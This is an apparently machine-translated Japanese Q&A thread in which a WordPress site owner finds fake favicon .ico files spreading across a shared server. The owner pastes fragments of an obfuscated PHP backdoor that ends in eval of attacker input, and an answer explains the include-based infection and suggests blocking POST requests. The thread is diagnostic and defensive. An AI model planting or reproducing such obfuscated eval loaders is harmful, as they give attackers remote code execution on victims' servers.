web-dev-qa-db-ja.com

Webサーバーに表示される不思議なicoファイル

共有Webサーバーの1つに予期せずにファイルが表示されます。それらはほとんど何百ものディレクトリに現れることができ、常にfavicon_1166f9.icoのようなものと呼ばれます。最初の6文字は常にfavicoで、拡張子は常にicoです。これらはアイコンではありませんが、画像ビューアで開くことはできません。

5日前にクリーンスイープを行い、これらのファイルを数百個削除しましたが、2つだけが見つかりました。私は以前にサーバー上でいくつかに気づきましたが、それはファビコンをアップロードすることによる単なる破損であると考えましたが、明らかにそうではありません。このサイトは、実際にはホームディレクトリに1つのfavicon.icoとして存在し、正常に機能しています。

これらのファイルが表示され続ける原因は何ですか?サイトはハッキングされていますか?

UPDATE 1:本当にハックのように見え始めました。挿入される部分コンテンツは次のとおりです。

$c6d81c6 = 607;$GLOBALS['g1aff67e']=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['h21842aa7']="\x59\x2f\x6c\x45\x75\x44\x7a\x6f\x68\x2a\x53\x74\x73\x51\x48\x72\x26\x21\x25\x67\x28\x70\x55\x7c\xa\x76\x35\x60\x52\x43\x65\x3d\x4d\x71\x4f\x32\x31\x7e\x34\x20\x5a\x41\x2e\x2c\x3b\x9\x30\x6a\x57\x6e\x3f

そして、それはで終わる7Kのために続きます:

[91].$g1aff67e['h21842aa7'][38].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][57].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][66].$g1aff67e['h21842aa7'][38]]($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db[1]($b7ce1c0db[2]));exit();}}} ?>

最後の部分はevalであり、残りは何でもあることに注意してください。

UPDATE 2このStackOverflowの質問 は同じ問題を抱えている人を示しています。

回答は受け入れられていますが、提案された解決策はすべてのPOSTリクエストを無効にすることです。これはWordPressサイトであり、POSTを使用する他の部分_も(多くはありませんが、必要です)。

この情報を考えると、これはattackであり、virusではないようです。

質問は次のとおりです:この攻撃が機能しないようにするにはどうすればよいですか?それが実際に起こっている場合.

4
Itai

これは、PHPリクエストによるPOST脆弱性を標的とした攻撃です。

攻撃者は、外部スクリプトを呼び出す自己復号化PHPファイルへの1つに変換されるエンコードパスを使用して、@ includeステートメントで既存のPHPファイルを何らかの方法で変更します。別のサーバーから。

これまで、POSTリクエストのブロックは機能します。ただし、外部POST要求に依存しないサイトでのみ可能です。これは.htaccessファイルで here で説明されているように実行できます。

1
Itai